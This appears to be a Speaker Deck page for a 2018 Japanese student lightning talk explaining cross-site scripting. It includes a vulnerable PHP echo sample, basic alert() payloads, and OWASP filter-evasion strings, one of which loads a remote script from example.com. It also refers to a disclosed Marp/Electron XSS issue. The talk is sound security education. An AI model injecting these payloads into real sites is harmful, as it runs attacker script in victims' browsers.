Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
83
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
200
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
320
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
410
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
900
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
390
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
170
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
180
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
330
Other Decks in Technology
See All in Technology
専門分化が進む分業下でもユーザーが本当に欲しかったものを追求するプロダクトマネジメント/Focus on real user needs despite deep specialization and division of labor
moriyuya
0
870
解消したはずが…技術と人間のエラーが交錯する恐怖体験
lamaglama39
0
180
みんなのSRE 〜チーム全員でのSRE活動にするための4つの取り組み〜
kakehashi
PRO
2
130
LLMをツールからプラットフォームへ〜Ai Workforceの戦略〜 #BetAIDay
layerx
PRO
1
830
Tableau API連携の罠!?脱スプシを夢見たはずが、逆に依存を深めた話
cuebic9bic
3
200
2025-07-31: GitHub Copilot Agent mode at Vibe Coding Cafe (15min)
chomado
2
360
風が吹けばWHOISが使えなくなる~なぜWHOIS・RDAPはサーバー証明書のメール認証に使えなくなったのか~
orangemorishita
15
5.4k
【CEDEC2025】大規模言語モデルを活用したゲーム内会話パートのスクリプト作成支援への取り組み
cygames
PRO
2
760
AIに目を奪われすぎて、周りの困っている人間が見えなくなっていませんか?
cap120
1
410
AIのグローバルトレンド 2025 / ai global trend 2025
kyonmm
PRO
1
110
興味の胞子を育て 業務と技術に広がる”きのこ力”
fumiyasac0921
0
570
Nx × AI によるモノレポ活用 〜コードジェネレーター編〜
puku0x
0
310
Featured
See All Featured
GraphQLの誤解/rethinking-graphql
sonatard
71
11k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3k
Imperfection Machines: The Place of Print at Facebook
scottboms
267
13k
Docker and Python
trallard
45
3.5k
How to train your dragon (web standard)
notwaldorf
96
6.1k
jQuery: Nuts, Bolts and Bling
dougneiner
63
7.8k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
47
9.6k
What’s in a name? Adding method to the madness
productmarketing
PRO
23
3.6k
Music & Morning Musume
bryan
46
6.7k
Become a Pro
speakerdeck
PRO
29
5.5k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
110
19k
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
tammyeverts
8
420
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
moriyuya
.jpg){kind=avatar}
lamaglama39
kakehashi
layerx
cuebic9bic
chomado
orangemorishita
cygames
cap120
kyonmm
fumiyasac0921
puku0x
sonatard
eileencodes
scottboms
trallard
notwaldorf
dougneiner
mongodb
productmarketing
bryan
speakerdeck
panda_program
tammyeverts
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
